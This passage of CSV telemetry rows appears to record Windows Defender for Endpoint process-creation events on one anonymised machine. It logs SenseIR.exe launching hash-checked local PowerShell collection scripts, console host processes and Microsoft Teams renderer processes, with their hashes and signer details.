01:27:36.387701600+00:00,b31c4eca-619a-4d36-90e7-37c9135e727c,computerpii_0a470890c60768167990033d701e7bd881398861,170932,False,10.7740.19041.1052,False,11540474045175619,,11540474045175620,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,SenseIR.exe,11584,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+769,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:32.310208+00:00,9856,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '74f6783ed94295ae59e7df03bd12725ee0b09b441541d6d3514d201dda61615f')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:32.382332+00:00,2021-06-24 01:27:36.387736+00:00,416ffa7e-df06-4a57-a911-36c657558429,computerpii_0a470890c60768167990033d701e7bd881398861,170933,False,10.7740.19041.1052,False,11540474045175619,,11540474045175623,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,SenseIR.exe,11584,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+770,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:32.324728300+00:00,12848,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:32.310208+00:00,9856,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '74f6783ed94295ae59e7df03bd12725ee0b09b441541d6d3514d201dda61615f')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:32.383323100+00:00,2021-06-24 01:27:36.387770900+00:00,e11d4db5-433b-4a7f-86c8-fd688f3e89fd,computerpii_0a470890c60768167990033d701e7bd881398861,170934,False,10.7740.19041.1052,False,11540474045175623,,11540474045175624,2021-06-24 01:25:32.310208+00:00,9856,2021-06-24 01:25:32.310208+00:00,powershell.exe,9856,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.352762+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+771,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:32.325223100+00:00,11176,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:32.310196700+00:00,8404,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '392cc8c75a0285f9d22c2b2c426a9ced73cc4d3ac2de972b65761b5b78cb4fca')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_a9713705aee948a3bbbe700bd681ded51e54e8b5.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:32.383502400+00:00,2021-06-24 01:27:36.387807400+00:00,e8319c21-3222-4ce4-bd8f-b3a1de2d0e45,computerpii_0a470890c60768167990033d701e7bd881398861,170935,False,10.7740.19041.1052,False,11540474045175620,,11540474045175625,2021-06-24 01:25:32.310196700+00:00,8404,2021-06-24 01:25:32.310196700+00:00,powershell.exe,8404,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.352762+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+772,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:32.325353800+00:00,20292,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:32.310202100+00:00,16528,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '860b4cdd466f2726cb0a70e8e277457c238c85126a012e988ac2e9a21621acfb')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:32.383708400+00:00,2021-06-24 01:27:36.387842500+00:00,88563bff-938c-400f-9a66-bd656e89feef,computerpii_0a470890c60768167990033d701e7bd881398861,170936,False,10.7740.19041.1052,False,11540474045175622,,11540474045175626,2021-06-24 01:25:32.310202100+00:00,16528,2021-06-24 01:25:32.310202100+00:00,powershell.exe,16528,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.352762+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+773,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:32.385369300+00:00,2488,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:32.310199600+00:00,10096,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '724627c153aa3f2da50b20d86f92b3d8662a6e37d3ae15b37a885cee9c094894')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b2b3c46e7876eff8bc6c49dd282de9e4b7f7af4f.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:32.403245900+00:00,2021-06-24 01:27:36.387877800+00:00,ef2b1b0f-446e-4b13-880e-9d4b2e517260,computerpii_0a470890c60768167990033d701e7bd881398861,170937,False,10.7740.19041.1052,False,11540474045175621,,11540474045175627,2021-06-24 01:25:32.310199600+00:00,10096,2021-06-24 01:25:32.310199600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,10096,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.316858600+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+774,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:39.502474400+00:00,17300,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\notifications\FilePII_e9b204e348814796c2a61feffc49c5ba27a5f5d5.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:1 --msteams-process-type=notificationsManager",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:39.531905400+00:00,2021-06-24 00:53:50.862547500+00:00,a292dd15-aeda-4947-83e6-c0c6abfdd01f,computerpii_0a470890c60768167990033d701e7bd881398861,168331,False,10.7740.19041.1052,False,11540474045175219,,11540474045175225,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+775,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:39.771838100+00:00,17436,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --webview-tag --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\FilePII_88702fd66fe3a1d7874360abd7c4f15c0cdd6a77.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1 --msteams-process-type=main-renderer --msteams-rendererid=main-renderer",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:39.921443200+00:00,2021-06-24 00:53:50.862705700+00:00,3976f24a-e24b-4195-b1ef-3c158bc433e2,computerpii_0a470890c60768167990033d701e7bd881398861,168335,False,10.7740.19041.1052,False,11540474045175219,,11540474045175227,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,Teams.exe,3760,256,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+776,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:39.962765800+00:00,8540,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=audio --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=3300 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:40.064299700+00:00,2021-06-24 00:53:50.862785700+00:00,bdee0ce8-b4bf-43d0-accd-6b3dedf89de0,computerpii_0a470890c60768167990033d701e7bd881398861,168337,False,10.7740.19041.1052,False,11540474045175219,,11540474045175228,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
